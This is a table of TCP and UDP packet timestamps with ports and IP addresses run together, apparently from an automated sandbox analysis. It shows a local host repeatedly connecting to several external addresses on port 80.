                                                                    Jan 10, 2025 21:31:39.350095987 CET8064224104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:39.963565111 CET8064224104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:39.963583946 CET8064224104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:39.963653088 CET6422480192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:39.964098930 CET8064224104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:39.964183092 CET8064224104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:39.964229107 CET6422480192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:40.850635052 CET6422480192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:41.869503975 CET6422680192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:41.874309063 CET8064226104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:41.874420881 CET6422680192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:41.890451908 CET6422680192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:41.895205021 CET8064226104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:41.895382881 CET8064226104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:42.524442911 CET8064226104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:42.524463892 CET8064226104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:42.524529934 CET6422680192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:42.525180101 CET8064226104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:42.525276899 CET8064226104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:42.525465965 CET6422680192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:43.398108959 CET6422680192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:44.416800022 CET6422780192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:44.421684027 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:44.421766043 CET6422780192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:44.429563046 CET6422780192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:44.434365988 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:45.060214043 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:45.060269117 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:45.060285091 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:45.060301065 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:45.060319901 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:45.060374022 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:45.060465097 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:45.060492039 CET6422780192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:45.060921907 CET6422780192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:45.084194899 CET6422780192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:45.089097023 CET8064227104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:58.367729902 CET6422880192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:31:58.372598886 CET8064228209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:31:58.372678041 CET6422880192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:31:58.388870955 CET6422880192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:31:58.393707991 CET8064228209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:31:58.975606918 CET8064228209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:31:58.975785017 CET8064228209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:31:58.975927114 CET6422880192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:31:59.912163019 CET6422880192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:00.917588949 CET6422980192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:00.922489882 CET8064229209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:00.922590971 CET6422980192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:00.941500902 CET6422980192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:00.946317911 CET8064229209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:01.521608114 CET8064229209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:01.521711111 CET8064229209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:01.521770954 CET6422980192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:02.467792034 CET6422980192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:03.479094028 CET6423080192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:03.484519958 CET8064230209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:03.484651089 CET6423080192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:03.501627922 CET6423080192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:03.506715059 CET8064230209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:03.506726980 CET8064230209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:04.083547115 CET8064230209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:04.083600044 CET8064230209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:04.084070921 CET6423080192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:05.007025003 CET6423080192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:06.025870085 CET6423180192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:06.030949116 CET8064231209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:06.031095982 CET6423180192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:06.040859938 CET6423180192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:06.045759916 CET8064231209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:06.670361042 CET8064231209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:06.670399904 CET8064231209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:06.670746088 CET6423180192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:06.673441887 CET6423180192.168.2.6209.74.77.107
                                                                    Jan 10, 2025 21:32:06.678263903 CET8064231209.74.77.107192.168.2.6
                                                                    Jan 10, 2025 21:32:11.735500097 CET6423280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:11.740358114 CET806423284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:11.740464926 CET6423280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:11.760071039 CET6423280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:11.764900923 CET806423284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:12.207725048 CET806423284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:12.207851887 CET6423280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:13.272762060 CET6423280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:13.277580976 CET806423284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:14.291284084 CET6423380192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:14.296188116 CET806423384.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:14.296283960 CET6423380192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:14.311113119 CET6423380192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:14.316024065 CET806423384.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:14.762258053 CET806423384.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:14.762335062 CET6423380192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:15.819463015 CET6423380192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:15.824316978 CET806423384.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:16.839055061 CET6423480192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:16.843919992 CET806423484.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:16.844010115 CET6423480192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:16.860701084 CET6423480192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:16.865545988 CET806423484.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:16.865658045 CET806423484.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:17.314533949 CET806423484.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:17.318240881 CET6423480192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:18.366404057 CET6423480192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:18.371257067 CET806423484.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.433525085 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.438509941 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.438635111 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.452558994 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.457412958 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896372080 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896397114 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896409988 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896421909 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896437883 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896450043 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896478891 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896492958 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896502018 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.896514893 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896528006 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:19.896620989 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.896655083 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.901545048 CET6423680192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:32:19.906335115 CET806423684.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:32:25.576292992 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:25.581114054 CET8064237154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:25.581208944 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:25.597104073 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:25.601991892 CET8064237154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:26.518134117 CET8064237154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:26.518224955 CET8064237154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:26.518280983 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:27.100920916 CET6423780192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:28.120737076 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:28.125637054 CET8064238154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:28.128118038 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:28.141944885 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:28.146753073 CET8064238154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:29.087755919 CET8064238154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:29.087812901 CET8064238154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:29.087865114 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:29.647871017 CET6423880192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:30.666376114 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:30.671257019 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:30.671344995 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:30.691261053 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:30.696096897 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:30.696377039 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:31.638020039 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:31.638300896 CET8064239154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:31.638361931 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:32.194533110 CET6423980192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:33.213210106 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:33.218175888 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:33.218280077 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:33.229238033 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:33.234069109 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:34.634125948 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:34.634243965 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:34.634334087 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:34.637296915 CET6424080192.168.2.6154.208.202.225
                                                                    Jan 10, 2025 21:32:34.642102003 CET8064240154.208.202.225192.168.2.6
                                                                    Jan 10, 2025 21:32:39.679768085 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:39.684658051 CET806424177.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:39.684755087 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:39.704314947 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:39.709042072 CET806424177.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:40.316082954 CET806424177.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:40.316097021 CET806424177.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:40.316256046 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:41.210225105 CET6424180192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:42.230015039 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:42.234872103 CET806424277.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:42.236362934 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:42.253525972 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:42.258450985 CET806424277.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:42.836327076 CET806424277.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:42.836430073 CET806424277.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:42.836491108 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:43.757251978 CET6424280192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:44.784873962 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:45.171367884 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.171616077 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:45.187633038 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:45.192451000 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.192622900 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.772799969 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.772878885 CET806424377.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:45.772964954 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:46.694566965 CET6424380192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:47.713793039 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:47.740053892 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:47.740156889 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:47.751015902 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:47.756484032 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:48.368899107 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:48.369072914 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:48.369227886 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:48.371973038 CET6424480192.168.2.677.68.64.45
                                                                    Jan 10, 2025 21:32:48.376806021 CET806424477.68.64.45192.168.2.6
                                                                    Jan 10, 2025 21:32:53.619071960 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:53.623886108 CET8064245208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:53.623950005 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:53.641719103 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:53.646482944 CET8064245208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:54.169518948 CET8064245208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:54.169583082 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:55.147641897 CET6424580192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:55.153177977 CET8064245208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:56.166670084 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:56.171515942 CET8064246208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:56.171607018 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:56.187534094 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:56.192320108 CET8064246208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:56.697544098 CET8064246208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:56.697607994 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:57.694662094 CET6424680192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:57.699542999 CET8064246208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:58.713366985 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:58.718210936 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:58.718343019 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:58.734687090 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:32:58.739483118 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:58.739635944 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:59.272682905 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:32:59.272959948 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:00.244354963 CET6424780192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:00.249475002 CET8064247208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:01.260292053 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:01.265170097 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:01.265278101 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:01.275188923 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:01.279944897 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365308046 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365323067 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365345955 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365364075 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365375996 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365386009 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365400076 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365410089 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.365443945 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.365509033 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.409852982 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.409923077 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.409934044 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410031080 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410028934 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.410053968 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410065889 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410087109 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.410118103 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.410439014 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410449028 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.410490036 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.455768108 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.455781937 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.455869913 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.455881119 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.455916882 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.455964088 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.456160069 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:02.456223011 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.462230921 CET6424880192.168.2.6208.91.197.27
                                                                    Jan 10, 2025 21:33:02.466981888 CET8064248208.91.197.27192.168.2.6
                                                                    Jan 10, 2025 21:33:07.536062956 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:07.540911913 CET806424984.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:07.542402029 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:07.563107014 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:07.567871094 CET806424984.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:07.998229980 CET806424984.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:08.000458002 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:09.069581032 CET6424980192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:09.074402094 CET806424984.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:10.088373899 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:10.093708038 CET806425084.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:10.096437931 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:10.112173080 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:10.117089987 CET806425084.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:10.556829929 CET806425084.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:10.557059050 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:11.616430998 CET6425080192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:11.621757030 CET806425084.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:12.635334015 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:12.640279055 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:12.640379906 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:12.657037020 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:12.661958933 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:12.662065983 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:13.126008987 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:13.126131058 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:14.163412094 CET6425180192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:14.168421984 CET806425184.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.182275057 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.187104940 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.187207937 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.198080063 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.203171015 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668168068 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668195963 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668210030 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668261051 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668275118 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668287992 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668299913 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668313026 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668325901 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668340921 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668369055 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.668406010 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.668566942 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:15.668605089 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.673104048 CET6425280192.168.2.684.32.84.32
                                                                    Jan 10, 2025 21:33:15.677890062 CET806425284.32.84.32192.168.2.6
                                                                    Jan 10, 2025 21:33:20.701726913 CET6425380192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:20.706860065 CET8064253104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:20.706969976 CET6425380192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:20.727333069 CET6425380192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:20.732460022 CET8064253104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:21.361675978 CET8064253104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:21.361699104 CET8064253104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:21.361805916 CET6425380192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:21.362795115 CET8064253104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:21.362849951 CET6425380192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:22.242275000 CET6425380192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:23.260432005 CET6425480192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:23.265651941 CET8064254104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:23.265763044 CET6425480192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:23.281539917 CET6425480192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:23.286401033 CET8064254104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:23.894311905 CET8064254104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:23.894999027 CET8064254104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:23.895076990 CET8064254104.21.80.1192.168.2.6
                                                                    Jan 10, 2025 21:33:23.895128965 CET6425480192.168.2.6104.21.80.1
                                                                    Jan 10, 2025 21:33:25.525829077 CET6425480192.168.2.6104.21.80.1

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 10, 2025 21:31:00.545301914 CET5351284162.159.36.2192.168.2.6
